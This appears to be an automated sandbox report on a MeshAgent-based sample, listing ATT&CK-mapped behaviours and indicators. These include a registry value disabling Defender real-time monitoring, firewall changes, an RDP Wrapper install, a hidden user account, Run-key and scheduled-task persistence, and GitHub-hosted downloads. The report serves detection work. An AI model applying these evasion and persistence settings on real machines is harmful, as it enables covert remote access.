meshagent | 15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 8 IoCs

flow	pid	Process
6	1136	powershell.exe
7	4724	powershell.exe
8	2452	powershell.exe
10	4720	powershell.exe
11	592	powershell.exe
12	4976	powershell.exe
21	32	powershell.exe
22	3608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2512	powershell.exe
5116	powershell.exe
5044	powershell.exe
3612	powershell.exe
3416	powershell.exe
4724	powershell.exe
2452	powershell.exe
4720	powershell.exe
1136	powershell.exe
592	powershell.exe
4976	powershell.exe
32	powershell.exe
3608	powershell.exe
3864	powershell.exe
3124	powershell.exe
1212	powershell.exe
3416	powershell.exe
2480	powershell.exe
1840	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
3596	netsh.exe
4636	netsh.exe
4608	netsh.exe
1972	netsh.exe
3828	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 6 IoCs

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll"	reg.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1972	attrib.exe
516	attrib.exe
1508	attrib.exe
1808	attrib.exe

Sets service image path in registry 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" "	s.exe

Executes dropped EXE 8 IoCs

pid	Process
4940	MeshAgent.exe
848	RDPWInst.exe
2776	RDPWInst.exe
516	RDPWInst.exe
5116	RDPWInst.exe
3364	RDPWInst.exe
4960	RDPWInst.exe
4972	RDPWInst.exe

Loads dropped DLL 5 IoCs

pid	Process
2012	svchost.exe
4552	svchost.exe
980	svchost.exe
5060	svchost.exe
1808	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
23	raw.githubusercontent.com
24	raw.githubusercontent.com
13	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 3 IoCs

Winlogon Helper DLL

T1547.004

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\profapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\powrprof.pdb	MeshAgent.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\4307425BA71567EFFC91EEAAB86CA11B9AC2177F	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\powrprof.pdb	MeshAgent.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wsspicli.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shlwapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Windows.Storage.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\cfgmgr32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\1B98F8ABBF65FBE354B400C765CBE382D6A2EB45	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wsspicli.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\SysWOW64\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File created	C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\6B7D0F6479349A0B1DCE02DF132B01590252294A	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\cfgmgr32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\cryptbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shell32.pdb	MeshAgent.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0"	reg.exe

Drops file in Program Files directory 34 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.exe	s.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\update.zip	powershell.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.zip	powershell.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4248	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4132	schtasks.exe
2448	schtasks.exe
4392	schtasks.exe
4204	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3416	powershell.exe
3416	powershell.exe
3416	powershell.exe
2480	powershell.exe
2480	powershell.exe
2480	powershell.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
1136	powershell.exe
1136	powershell.exe
1136	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
3612	powershell.exe
3612	powershell.exe
3612	powershell.exe
2512	powershell.exe
2512	powershell.exe
2512	powershell.exe
5116	powershell.exe
5116	powershell.exe
5116	powershell.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
4552	powershell.exe
4552	powershell.exe
4552	powershell.exe
592	powershell.exe
592	powershell.exe
592	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
4372	powershell.exe
4372	powershell.exe
4372	powershell.exe
2012	svchost.exe
2012	svchost.exe
2012	svchost.exe
2012	svchost.exe
32	powershell.exe
32	powershell.exe
32	powershell.exe
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe
8	powershell.exe
8	powershell.exe
8	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
628	Process not Found
628	Process not Found
628	Process not Found
628	Process not Found
628	Process not Found
628	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeIncreaseQuotaPrivilege	3416	powershell.exe
Token: SeSecurityPrivilege	3416	powershell.exe
Token: SeTakeOwnershipPrivilege	3416	powershell.exe
Token: SeLoadDriverPrivilege	3416	powershell.exe
Token: SeSystemProfilePrivilege	3416	powershell.exe
Token: SeSystemtimePrivilege	3416	powershell.exe
Token: SeProfSingleProcessPrivilege	3416	powershell.exe
Token: SeIncBasePriorityPrivilege	3416	powershell.exe
Token: SeCreatePagefilePrivilege	3416	powershell.exe
Token: SeBackupPrivilege	3416	powershell.exe
Token: SeRestorePrivilege	3416	powershell.exe
Token: SeShutdownPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeSystemEnvironmentPrivilege	3416	powershell.exe
Token: SeRemoteShutdownPrivilege	3416	powershell.exe
Token: SeUndockPrivilege	3416	powershell.exe
Token: SeManageVolumePrivilege	3416	powershell.exe
Token: 33	3416	powershell.exe
Token: 34	3416	powershell.exe
Token: 35	3416	powershell.exe
Token: 36	3416	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeIncreaseQuotaPrivilege	2480	powershell.exe
Token: SeSecurityPrivilege	2480	powershell.exe
Token: SeTakeOwnershipPrivilege	2480	powershell.exe
Token: SeLoadDriverPrivilege	2480	powershell.exe
Token: SeSystemProfilePrivilege	2480	powershell.exe
Token: SeSystemtimePrivilege	2480	powershell.exe
Token: SeProfSingleProcessPrivilege	2480	powershell.exe
Token: SeIncBasePriorityPrivilege	2480	powershell.exe
Token: SeCreatePagefilePrivilege	2480	powershell.exe
